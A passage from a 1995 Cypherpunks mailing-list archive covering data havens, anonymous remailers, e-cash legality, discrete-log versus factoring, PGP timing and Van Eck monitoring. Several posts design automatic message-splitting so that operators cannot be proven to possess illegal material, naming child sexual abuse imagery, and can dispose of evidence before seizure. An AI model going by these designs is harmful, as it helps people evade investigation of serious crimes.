symbolic legal attack" every once in a while will scare would-be black-marketeers. Later, he does discuss the hidden costs of acquiring pirated versus genuine stuff - "the time and effort needed to track down pirate dealers [...] who are so deep underground even the cops can't find them." Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for anon-remailers (which exist today on Sameer's c2.org blind server) and data havens. I haven't bothered to hunt for Lance's address, which is not given, but really I thought someone as prominent a SysLawyer as him would be clued in. Nor have I found the time to send WIRED a letter. OTOH maybe ignorance, for LEA-friendly legislators who read WIRED, is bliss? Let the sleeping dog lie, etc, just finish your data haven code ;-] ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From meconlen at IntNet.net Wed Jan 18 18:18:30 1995 From: meconlen at IntNet.net (Michael Conlen) Date: Wed, 18 Jan 95 18:18:30 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: On Wed, 18 Jan 1995, Jonathan Cooper wrote: > > If the authorities attempt to indict you for possessing illegal > > information / kiddie porn / whatnot, they have to prove that you > > interfered with the automatic redistribution process and examined the > > contents of the submission. If you in fact did not look at the submission, > > they would have a difficult time doing so. > > Unfortunately I've found that the U.S. government especially can make > your life a living hell if you don't go along with their desires, even if > you're following all the laws. Trumped-up charges. Fake charges. I > wouldn't put much past our government. I think the worst is that the government never seems to be in the mood for giving your computer equipment back to you. Hiding your phycal location, being out of the question, (old thread), all the government has to do is drum up suspision and enough information for a warrant for your computer equipment, then your screwed out of a system. If you had a system good enough to efectivly handle DH's or even remailers, your out of a good sum of money. Groove On Dude Michael Conlen From wcs at anchor.ho.att.com Wed Jan 18 18:25:16 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Wed, 18 Jan 95 18:25:16 PST Subject: Electronic cash illegal? Message-ID: <9501190223.AA07519@anchor.ho.att.com> > Within the United States (and most other sovereign states) Hal Finney is > correct to point out that the power to print currency is reserved to the > government. I would think that e-cash is a currency and therefore illegal > TO ISSUE WITHIN the geographical (legal) domain of the US. He didn't say it was illegal to print private banknotes, just taxable. Anybody can issue paper or metal tokens or whatever - the difference with goverment-issue currency is that they can pass laws saying you must accept it as payment for debts, even though your contract specified repayment in real money instead of private bogons like green paper IOUs or lightweight impure-metal coins with politician's pictures on them. As far as I know, the legal definition of a "dollar" in the US is still a certain weight of silver, and payment in silver legally satisfies debts; under current silver prices, that probably costs more than a $1 US Federal Reserve Note, so nobody bothers. Bill From bdolan at use.usit.net Wed Jan 18 18:32:30 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Wed, 18 Jan 95 18:32:30 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: I'm not familiar with all aspects of this but one thing argues in favor of hoping this becomes a test case: Scientologists are probably more out of favor than cypherpunks. Brad On Wed, 18 Jan 1995 Ben.Goren at asu.edu wrote: > At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote: > >[. . .] As long as > >some piece of info is considered to be a thought-crime, everyone who accepts > >info from a wide range of sources is at risk. > > We might have a test case right now for part of that idea--the > Scientologists. They're essentially claiming that the various newsgroups > should be shut down because somebody put thoughtcrime on them. I would > posit that the operator of any automated data transmission/massaging > service is not responsible for the data that passes through her equipment. > Consider, for example, if I used a bang path to route an illicit email note > through, say, apple.com. Does that make Apple Computer responsible for what > I send? > > Tying in with some of Eric's comments, this could be viewed as a > fundamental flaw in the 'net: it's the sender, generally, who initiates and > controls the connection, not the recipient. We could view this as an > advantage: how can you blame me for what somebody else does to my computer > without my knowledge, especially if I have no way to stop it short of > getting off the 'net completely? > > >> ... The service could even be advertised as a different form of timestamping > >>(or notarizing). Not only do you get the file back signed, but you get it > >>back encrypted and signed. ... > > > >That would still be a useful service, however, but it does transfer the risk > >from the DH operator to the encryptor. Since he isn't leaving evidence on a > >hard drive, his window of vunerability is somewhat less. > > Less to nonexistent. If no human sees it on the encrypting site, no human > can be responsible for it. "They" would have to ban the service outright, > or try to prove that you knew that your site would be used for illicit > purposes. If putting a warning to not export crypto software on an ftp site > is sufficient protection--and, judging from the number of sites which do no > more than that, it is--then a simple statement that the service is not to > be used for any illegal purpose should do fine here. > > > --Paul J. Ste. Marie > > pstemari at well.sf.ca.us, pstemari at erinet.com > > b& > > -- > Ben.Goren at asu.edu, Arizona State University School of Music > Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. > > > From wcs at anchor.ho.att.com Wed Jan 18 18:35:04 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Wed, 18 Jan 95 18:35:04 PST Subject: Another problem w/Data Havens... Message-ID: <9501190233.AA07621@anchor.ho.att.com> > I could write a procmail recipe and a script in about an hour to > automatically secret-share-split and redistribute the incoming submission. > If the authorities attempt to indict you for possessing illegal > information / kiddie porn / whatnot, they have to prove that you > interfered with the automatic redistribution process and examined the > contents of the submission. If you in fact did not look at the submission, > they would have a difficult time doing so. The problem with a procmail script, unlike the ugly on-the-fly SMTP-like splitting method I proposed, is that the suspicious message is in your mail system, intact, and if they nail you before you can dispose of it, they can prove you had it. (Even though procmail does stuff quickly, sendmail still accumulates the material before delivering it, doesn't it?) They still have to prove that there's something illegal or forfeiture-supporting about the way you possessed the message, but by then you're hauled into court and your computer is stolen. The Feds argued in the Steve Jackson Games fiasco that intercepting unread mail in mailboxes is different than intercepting it in transit, and while we can hope that will be overturned, it's better not to be the guinea pig. If your machine never has more than a few bits of the message, they can't catch you in possession of the message - they can only argue that bits of it flowed through your machine, and that's much harder to build a case on, and given the abuse the judge gave the Bad Guys in the SJG case, it's probably easy to prevent them from keeping your machine as evidence, or at least get it back. Your paranoia may vary.... Bill From wcs at anchor.ho.att.com Wed Jan 18 18:56:30 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Wed, 18 Jan 95 18:56:30 PST Subject: Scientologys Attempts Message-ID: <9501190254.AA07887@anchor.ho.att.com> > > > who has the authority to remove alt. groups? jamesd writes: > Anybody has the power. Nobody has the authority. More precisely, anybody has the power to send a rmgroup message, just like anybody has the power to send a cancel message. Aside from ettiquette and ethics, the question is whether most of the news servers out there will respond to them, which is a local decision. The last time I ran a news server was in B News days, so your mileage may vary, but responses to newgroup and rmgroup messages can be turned on and off. I used to leave them turned on; not only did new groups appear on my system without manual intervention, but the Great Renaming took care of itself automatically on my box. > [...] This is a classic case of net abuse. Yep. rmgroup wars happen occasionally on the net, usually about alt.joe.newuser.die.die.die and other spam groups run by (or about) people with more spare time than taste. The difference here is that it's part of an organized group-sponsored censorship attempt, rather than an individual squabble, so it retains some degree of classicity. Bill From eric at remailer.net Wed Jan 18 19:01:47 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 19:01:47 PST Subject: On DH public key crypto Message-ID: <199501190301.TAA09049@largo.remailer.net> Diffie and Hellman did have a public key cipher based on matrices in their original paper; they knew at the time it didn't work. This is not the same algorithm as the D-H key exchange protocol. Eric From nzook at bga.com Wed Jan 18 19:13:01 1995 From: nzook at bga.com (Nathan Zook) Date: Wed, 18 Jan 95 19:13:01 PST Subject: JP vs Homer Message-ID: -----BEGIN PGP SIGNED MESSAGE----- A side note: "The ultimate hacks of Wall Street." Now THERE is an idea... You think Donald Trump could see the usefulness of e*? Ivan Boskey? (sp) To the point: JP's withdrawal, and Homer's thread point to something that I've felt for a while: The classification of our tools as munitions has an important point--they should not be used by children. A.S.R not withstanding, (such a person has had their childhood robbed) what we are doing is _very serious_. Sometimes we talk about pulling down the entire structure of our governments and economy as if it we a Sunday afternoon parlor exercise, or a pipe dream. It is neither. We are on the verge of a restructuring of our society. Cypherpunk projects are the bleeding edge. Implementation calls for serious, considered efforts. Childish behavior is not only uncalled for, it must be anticipated and prevented, or as a minimum, found and fought. I have long been concerned that the remailers are far to vulnerable to either childish abuse or TLA attacks. The former is reaching the stage of threatening to swamp us, either by resource depletion, or by stigmatizing our efforts. There is little, if anything, we can do to stop a chained, PGP'ed mail bomb, "This is mail bomb number XXX. Boom!" It is therefore in our best interest to not encourage children to send such messages in such a way. I believe Homer's message was erroneous for this reason. We do have considerable interest, however, in maintaining a positive image. Positive image is a multifaceted jewel. We must look to preserve it as much as possible while pursuing our goals. We are capable of controlling mail bombs, for instance, in the following way: Take an incoming message, capture From: line. Strip header. MD5 body. Add to sorted table [From: MD5(message) date]. Check for repetition of first two fields. If reps = 1, forward message. If reps = 2, send message to From: "Possible error. Two copies of message received." If reps = 0 mod 5, send letter to postmaster at From:. "Possible mailbomb or spam. copies of received from at your site in the past week." Clear table of entries more than a week old every midnight. If all remailers did this, then no matter where the net was entered, the messages would be rejected. And spammers/bombers would be spamming/ bombing their own postmaster. Probably a bad idea. If not all did it, then add special handling to hit remailer-operator at . This would encourage the operator to auto-magically handle the spam-bomb himself. Dealing with huge files and/or TLA's is a topic for another day. Remember: spook at cia.gov, snitch at fbi.gov, and cracker at nsa.gov are probably all listening, maybe even denning at aol.com. Is it a stretch to consider that _they_ might spam-bomb us, trying to discourage the best? Finger or request keyserver for PGP 2.6.2 (tm) key. PGP<->Mail/News installation incomplete. Factors for modulous are not proven primes. Key may be far weaker than expected. Encode at your own risk. Key ID: 14712B4D 1994/12/26 Nathan H. Zook Key fingerprint = 44 B3 D8 66 3D 55 1E 2E F8 92 22 A6 33 8C DE 24 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLx3pBHmgMs8UcStNAQGuhAf+KGYJnYRPAODHvjF4CmakZ1oZKDo2BiFQ 5nkphXtoTgADVQM8XlYhqW3MTKhKo30dfZ0/GMLdaZ+4SCM85thqNvLW1klaandk tuAF4NBTx8f5rb3ufm9iktXv907smf6aUZAwz0T4cl630+/dVPI2Jkit0jid5KmD TzB/bFr1lM7Vp2ZoR+Y6/geYYNx06OMvLl62hTpGP2KtusFs1erRuYXj8UJkXd77 JNnTLjrPdLhx6iIQ6IxNXAISnmIgXPGFVRto/EEgFa8XWUoOBeuRdBGhT4eoNAjX 45YxdJrmlSPxHZDu8P2rldfays31qPCY7qJtSKBdRzYqqyz8LT+4YQ== =luXm -----END PGP SIGNATURE----- From dwa at mirage.svl.trw.com Wed Jan 18 19:39:07 1995 From: dwa at mirage.svl.trw.com (Dana Albrecht) Date: Wed, 18 Jan 95 19:39:07 PST Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ) Message-ID: <9501190339.AA20854@mirage.svl.trw.com> strick wrote: > > DH uses "discrete log" as the hard problem, and very straightforward > mathematics. > > RSA uses "factoring" as the hard problem, and a very clever back door. > > How do you decide if one is based on the other? > > # public-key technology with Diffie-Hellman public-key in particular, which > # (as I understand it) is not particularly secure. > > It's still up in the air, isn't it, whether the discrete log or > factoring is the harder to crack. My intuition is they're the > same hard. > > I know of no problem with DH that RSA doesn't have similar problems. > > strick It seems to me that factoring a large number is no harder than finding a discrete logarithm. Assume, for the moment, that an efficient method of computing discrete logs has been discovered, rendering systems like Diffie-Hellman key exchange unusuable. I contend that RSA is now equally unusable. The following variant of the Pollard p-1 method should provide an efficient factorisation method for an RSA modulus, say N. Choose, at random, "a" such that gcd(a,N) = 1. Compute x such that: a^x = 1 (mod N) [ Discrete log time! ] Partially factor x; say x = f * f * f ... where f is not necessarily prime. 1 2 3 n Note that it is usually easy to partially factor a "random" large integer. Simply using trial division up to some limit; or, at worst, pollard rho or pollard p-1 (on x) should suffice. If you're truly unlucky, pick another value for a. Compute: M = a^(10000! * f) (mod N) Where f is some partial factor of x. gcd(M-1,N) should yield a non-trivial factor of N. If it doesn't, another choice of f and/or a should work. I'm by no means a professional mathematician, but it seems that this scheme should work. Comments, anyone? Dana W. Albrecht dwa at mirage.svl.trw.com From eric at remailer.net Wed Jan 18 19:39:11 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 19:39:11 PST Subject: Key backup (was: How do I know . ..) In-Reply-To: <199501181754.MAA24686@bb.hks.net> Message-ID: <199501190338.TAA09099@largo.remailer.net> From: "Dr. D.C. Williams" Safe deposit boxes, by virtue of their accessibility to law enforcement, are subject to search and seizure under court order and are sealed in certain cases (probate). This makes them likely to be the first place to look when the Feds decide that we can't have keys anymore. I am not designing systems for the paranoid fantasy of an inspection of all safety deposit boxes by government agents in search of contraband. I am interested in designing systems which will fit into business as usual, that are inconspicuous by their prevalance, and which will be a part of ordinary and usual protection of data by cryptographic means. Our goals appear to differ enough to preclude my continuing involvement on this topic. Eric From warlord at MIT.EDU Wed Jan 18 19:40:10 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 18 Jan 95 19:40:10 PST Subject: Electronic cash illegal? In-Reply-To: <9501190223.AA07519@anchor.ho.att.com> Message-ID: <9501190336.AA12782@toxicwaste.media.mit.edu> > As far as I know, the legal definition of a "dollar" in the US is still a > certain weight of silver, and payment in silver legally satisfies debts; > under current silver prices, that probably costs more than a > $1 US Federal Reserve Note, so nobody bothers. Uhh, no, US currency does not have any backing. I believe it was Nixon who stopped it, possibly even earlier than him. There _used_ to be Gold- and Silver-backed dollars, but no longer. The US dollar is backed by trust alone, today. -derek From eric at remailer.net Wed Jan 18 19:52:16 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 19:52:16 PST Subject: (none) In-Reply-To: Message-ID: <199501190351.TAA09133@largo.remailer.net> From: Brian Beattie I must assume that the actor who spams me or sends me unsolicited email or any email for that matter derives some benifit from this activity or they would not do it. Much tort involves perceived gain by the tortfeasor, but that doesn't make it theft. If I make it clear that I do not wish to receive email from an individual or group and that individual or group continues to send email then I contend that they are using my resources in a way that I have not authorized. So who are you making it clear to, if the parties sending the email are anonymous? Eric From yusuf921 at uidaho.edu Wed Jan 18 20:00:55 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Wed, 18 Jan 95 20:00:55 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: On Tue, 17 Jan 1995, Craig Hubley wrote: > Regarding BlackNet, I am not sure that they are not *run* by the FBI, > or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental > entity. The more I think about it the more this theory makes sense. I know how they _could_ have traced me but this doesn't explain all their other "leads" they are following up on and he seemed to imply there were many. >>> Not to mention entrapment is their MO. <<< What do you say we put the word out? > Craig Hubley Business that runs on knowledge > Craig Hubley & Associates needs software that runs on the Web > craig at passport.ca 416-778-6136 416-778-1965 FAX --Syed From warlord at MIT.EDU Wed Jan 18 20:03:06 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 18 Jan 95 20:03:06 PST Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ) In-Reply-To: <9501190339.AA20854@mirage.svl.trw.com> Message-ID: <9501190357.AA12988@toxicwaste.media.mit.edu> > Comments, anyone? You are right... Given talks Ive had with Brian LaMacchia, who broke a version of "Secure SunRPC" (a 192-bit prime), he claims that the difficulty is reducing a D-L problem is about the same amount of computation to factorize an RSA modulus of approximately the same size.. So, within napkin-computation, you are correct. -derek From tcmay at netcom.com Wed Jan 18 20:05:41 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 20:05:41 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: Message-ID: <199501190404.UAA24779@netcom6.netcom.com> rishab at dxm.ernet.in wrote: > Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for > anon-remailers (which exist today on Sameer's c2.org blind server) and > data havens. I haven't bothered to hunt for Lance's address, which is not > given, but really I thought someone as prominent a SysLawyer as him would > be clued in. Nor have I found the time to send WIRED a letter. First, I want to know how Rishab, in India, gets "Wired" so early (or why I, right next to Silicon Valley, get it so late). He's mentioned the February issue twice now, and all I have is the January "White Album." Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" (?). When I met him a couple of years ago, he'd just gotten out of jail and was working for the satellite Usenet distribution company (whose name I don't recall, and who I've heard less of than I might've expected to, subjunctively speaking). In any case, there a zillion odd opinions on the Net of a Million Lies. Most of them will vanish without a trace. That's comforting. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From roy at cybrspc.mn.org Wed Jan 18 20:38:55 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Wed, 18 Jan 95 20:38:55 PST Subject: copyright and data havens In-Reply-To: Message-ID: <950118.222008.4k2.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, asgaard at sos.sll.se writes: > (by the way, how long might it take to IDEA-encrypt a 2 MB > .zip file? I never tried) Me, neither. Let's find out.... [1] d:\doom>dir tt.zip Volume in drive D is unlabeled Serial number is 0000:13FD Directory of d:\doom\tt.zip tt.zip 2292723 1-18-95 22:06 2,292,723 bytes in 1 file(s) 2,293,760 bytes allocated 4,853,760 bytes free [1] d:\doom>timer^pgp +armor=off +compress=off +textmode=off -c tt.zip ^ timer Timer 1 on: 22:16:16 Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses. (c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94 Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc. Distributed by the Massachusetts Institute of Technology. Export of this software may be restricted by the U.S. government. Current time: 1995/01/19 04:16 GMT You need a pass phrase to encrypt the file. Enter pass phrase: Enter same pass phrase again: Just a moment... Ciphertext file: tt.pgp Timer 1 off: 22:18:42 Elapsed: 0:02:26.05 '+textmode=off' is probably overkill, since PGP recognizes the non-text content. But my config.txt has armor and compress turned on. Compressing almost doubled the time to encrypt, and armor gave me 39 *.asc files. - -- Roy M. Silvernail -- roy at cybrspc.mn.org will do just fine, thanks. "Does that not fit in with your plans?" -- Mr Wiggen, of Ironside and Malone (Monty Python) PGP public key available upon request (send yours) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLx3pkBvikii9febJAQFfgwP+MkpU2xv9zUPyYIYtzvsTUzSSdjcVi4Dd 8PW8AmVFCu2xHI0Zce8CCh3/i+ZMK15E6xvoFdESwS3mkz9DIBZZ/JfyPu0kQ4Lc H76HHoBQNyW00K4Alzfa1rkvyiot8j3KjagpOcCazMlCsKfbZ/xa8PSt8ae8H2k5 RpoZ3o8H87k= =FGL8 -----END PGP SIGNATURE----- From mpd at netcom.com Wed Jan 18 20:50:57 1995 From: mpd at netcom.com (Mike Duvos) Date: Wed, 18 Jan 95 20:50:57 PST Subject: Factorisation and Discrete Logs In-Reply-To: <9501190357.AA12988@toxicwaste.media.mit.edu> Message-ID: <199501190440.UAA28769@netcom5.netcom.com> Derek Atkins writes: > You are right... Given talks Ive had with Brian LaMacchia, > who broke a version of "Secure SunRPC" (a 192-bit prime), he > claims that the difficulty is reducing a D-L problem is > about the same amount of computation to factorize an RSA > modulus of approximately the same size.. Although DH and RSA are believed to be of approximately equal difficulty given the same number of bits, DH is additionally vulnerable because system designers usually publish an "official" modulus and primitive root for everyone to use, whereas in RSA, everyone has their own key. To mount an attack on PGP, for instance, you must factor a key for each person whose privacy you wish to compromise. Breaking Sun's published 192 bit DH modulus instantly broke SunRPC on all machines using the protocol. The latter was a lot less work than the former. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From hfinney at shell.portal.com Wed Jan 18 21:04:22 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 18 Jan 95 21:04:22 PST Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ) Message-ID: <199501190504.VAA03998@jobe.shell.portal.com> From: dwa at mirage.svl.trw.com (Dana Albrecht) > Choose, at random, "a" such that gcd(a,N) = 1. > > Compute x such that: > > a^x = 1 (mod N) [ Discrete log time! ] DH uses prime moduli, I believe. Solving the DL problem sufficiently to break DH may not let you solve it for composite moduli, not without knowing the factors. Hal From pstemari at erinet.com Wed Jan 18 21:16:33 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 18 Jan 95 21:16:33 PST Subject: TEMPEST Message-ID: <9501190507.AB17284@eri.erinet.com> At 12:32 PM 1/18/95, Timothy C. May wrote: > ... And if nothing is seen with our $10K of equipment, what does this >prove against an attacker who can easily afford to spend 20 or 30 >times that amount to equip a van? > >Cypherpunks have been exploiting technology that is comparatively >_much cheaper_ and which changes the equation. > > ... In general, for reasons many of us have written about here before, and in >particular, because I think spending $10,000 to prove what we already >know--that RF emissions can be detected and demodulated--is a poor use >of money. That $10K would go a long way to getting PGP Phone finished. ... I'm not sure how encryption chages the equation if that van on the street can read the data off your screen and/or printer. Just as cryptanalysis is a necessary component of good cryptography, some sort of VanEck analysis would seem to be required in order to evaluate the utility of methods to block it. What exactly would one need to do to block Van Eck monitoring? I've seen computer rooms that were completely lined with copper sheathing. Is it really necessary to go to that extent? Will aluminum foil and power line conditioning handle it? You can't really tell how effective counter-measures are unless you have some way to see what reduction in emitted signal they provide. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From adam at bwh.harvard.edu Wed Jan 18 21:18:16 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 18 Jan 95 21:18:16 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com> Message-ID: <199501190516.AAA09260@bwh.harvard.edu> Tim wrote: | rishab at dxm.ernet.in wrote: | | > Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for | > anon-remailers (which exist today on Sameer's c2.org blind server) and | > data havens. I haven't bothered to hunt for Lance's address, which is not | > given, but really I thought someone as prominent a SysLawyer as him would | > be clued in. Nor have I found the time to send WIRED a letter. | | First, I want to know how Rishab, in India, gets "Wired" so early (or | why I, right next to Silicon Valley, get it so late). He's mentioned | the February issue twice now, and all I have is the January "White | Album." He doesn't have to contend with the USPS? (My copy arrived today, quite beat up, and missing most of its white envelope. Sigh.) | Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" | (?). When I met him a couple of years ago, he'd just gotten out of You're thinking of Len Rose, not Lance Rose. (Assuming this is the L. Rose who features in The Hacker Crackdown.) Regarding Rishab's points about the article, I think its a useful fantasy. Let Lance think that net.cops will win, until the reality proves otherwise. At least he doesn't call for banning remailers. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at netcom.com Wed Jan 18 21:43:25 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 21:43:25 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com> Message-ID: <199501190459.UAA26969@netcom12.netcom.com> Timothy C. May wrote: > Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" > (?). When I met him a couple of years ago, he'd just gotten out of > jail and was working for the satellite Usenet distribution company > (whose name I don't recall, and who I've heard less of than I might've > expected to, subjunctively speaking). Josh Geller reminded me that it may've been Len Rose I was thinking of. Len, Lance, I don't know. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From sdw at lig.net Wed Jan 18 23:52:52 1995 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 18 Jan 95 23:52:52 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com> Message-ID: ... > Album." > > Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" > (?). When I met him a couple of years ago, he'd just gotten out of > jail and was working for the satellite Usenet distribution company > (whose name I don't recall, and who I've heard less of than I might've > expected to, subjunctively speaking). Bzzzt.... You're error correction is working overtime... That's Len Rose, formerly with Pagesat, currently with barrnet. His offense, BTW, was basically giving the source to ATT login.c to a college kid... Documented somewhat poorly in 'The Hacker Crackdown', Bruce Sterling. > In any case, there a zillion odd opinions on the Net of a Million > Lies. Most of them will vanish without a trace. That's comforting. > > --Tim May Now, my name is one that really should cause collisions... sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/sdw Senior Consultant 513-865-9599 FAX/LIG 513.496.5223 OH Page BA Aug94-Feb95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95 From tcmay at netcom.com Wed Jan 18 23:57:21 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 23:57:21 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: Message-ID: <199501190756.XAA08643@netcom20.netcom.com> Stephen D. Williams wrote: > Bzzzt.... You're error correction is working overtime... > > That's Len Rose, formerly with Pagesat, currently with barrnet. > His offense, BTW, was basically giving the source to ATT login.c > to a college kid... Documented somewhat poorly in 'The Hacker Crackdown', > Bruce Sterling. Enough already! This is the seventh or eighth such correction that's been sent to me, some of them also sent to the list. I understand that errors get picked up promptly by all you eagle-eyes, but enough already. Thanks, --Tim May From exabyte!gedora!mikej2 at uunet.uu.net Thu Jan 19 01:12:38 1995 From: exabyte!gedora!mikej2 at uunet.uu.net (Mike Johnson second login) Date: Thu, 19 Jan 95 01:12:38 PST Subject: Multiple symetric cyphers In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com> Message-ID: On Thu, 12 Jan 1995, Paul Robichaux wrote: > > But selecting a single cipher is just as much a fixed policy as a > > randomly selected one is. Far better to let the user pick a policy, > > both about sent and accepted ciphers. > > If you do give the user control, what is an acceptable mechanical > implementation? Let's say I have a file encryptor which allows the > user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I > require the user to tell that program what cypher was used to encrypt > the file she wishes to decrypt? > > Is storing the cypher type as part of the encrypted file a weakness? Perhaps it is. The algorithm set could be part of the key, though... From tcmay at netcom.com Thu Jan 19 01:15:06 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 01:15:06 PST Subject: The Remailer Crisis Message-ID: <199501190914.BAA19681@netcom20.netcom.com> I don't think I've used "crisis" in a thread I started, so this tells you what I think. The remailers are stagnating, only very slowly adding important features, and the number is not growing...in fact, it's been shrinking. This, as the remailers are under attack. Editorialists are railing against the dangers of anonymity and remailers, and the "Church of Scientology" is threatening lawsuits against remailer operators unless they block certain newsgroups. (Lots of issues, clever workarounds proposed, etc.) Now whether or not the Church of Scientology, or RSADSI (for the RC4 code remailing), or anyone else could legally _win_ such a case is not the issue. Not many remailer operators would be able to mount a defense...they are not, frankly, folks heros as Zimmermann is--and even PRZ is struggling to raise money. Maybe the EFF (ugh) would leap into the fray, but I doubt it. Nope, I fear that the pressures that have driven several remailers to halt operation are just the tip of the iceberg. (Some remailers have quit because of words from their sysadmins, semi-threatening conversations with Brad Templeton--Hi, Brad!--, and so on. Real letters from real lawyers would have a profoundly more chilling effect.) We've debated this stuff many times, but the numbers of remailers are shrinking. Raph Levien summarized the situation nicely in a post to alt.anon-server: "We're down to fifteen remailers now, many of which are unreliable. I would say the remailer net is not in good shape right now. Fortunately, I know of a number of plans to bring new remailers up, as well as restoring old ones." (I hope Raph can share with us soon what some of the plans are, unless he fears revealing this will aid our opponents.) I could see the whole remailer system imploding. A few threatening letters, especially if sent by real lawyers, could demolish the few U.S. sites. And with the Netherlands toying with proposals to ban or limit private encryption, having Holland as the main remaining host for remailers would be rather precarious. We need lots more remailers, in many more countries. What can be done? * We need to get the number of "solid" remailers up from the current dozen or so up into the _hundreds_. * I favor separating the "account that remails" from the "owner of the site," as I have argued in vain in the past. (Example: a willing site gives out or sells many accounts...each is legally separate, and each must be legally challenged. My longer posts dealt with this.) (The owner of the site/machine can take a "hands off" attitude toward what his customers are doing in their accounts. This doesn't stop pressures from being applied, but it slows them down, and (probably) better insulates the owner from legal charges.) * Traffic needs to be increased. Remailers should probably go to constant padding traffic, to do this. Exhorting end-users to use remailers more won't be enough. * More offshore sites are needed. So far, only Canada and the Netherlands are offshore hosts (and Canada is effectively part of the U.S.). Some sites in Russia would be dramatic. Ditto for Asia, South America, etc. * The whole issue of "remailer businesses," with all the usual issues of digital postage, stamps, coupons, etc, has to be resolved. That is, we need to get some movement here. Most remailers are run as projects by students on machines they don't control, or that they can be pressured on, or with a committment to stay in business that will evaporate too easily. A business, with business responsibilities, is usually a more stable solution. I think we need to set some rough targets and brainstorm on how to get to them. For example, the Linux mavens could tell us if Linux-based remailer boxes could be hung on dedicated connections to The Little Garden network, as a specific example. A "black box remailer" such as several folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be buildable for under a grand. We could ask here for contributions, and might even raise this amount of money. Then each of us who contributed could have "accounts," maybe several of them. Imagine 100 or more "remailers" all on this one machine--I'm deliberately ignoring the security issue for now. Little Garden has stated categorically that they will not tell users what they can or can't do with their machines (though I can think of some cases where they might have to, as with spamming, etc.). Anyway, you can see where I'm headed. My big fear is that the one really major achievement of the Cypherpunks group, the remailers, are not increasing in number and could be knocked out all too easily with some legal attacks. It's time to get cracking on this crisis. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, 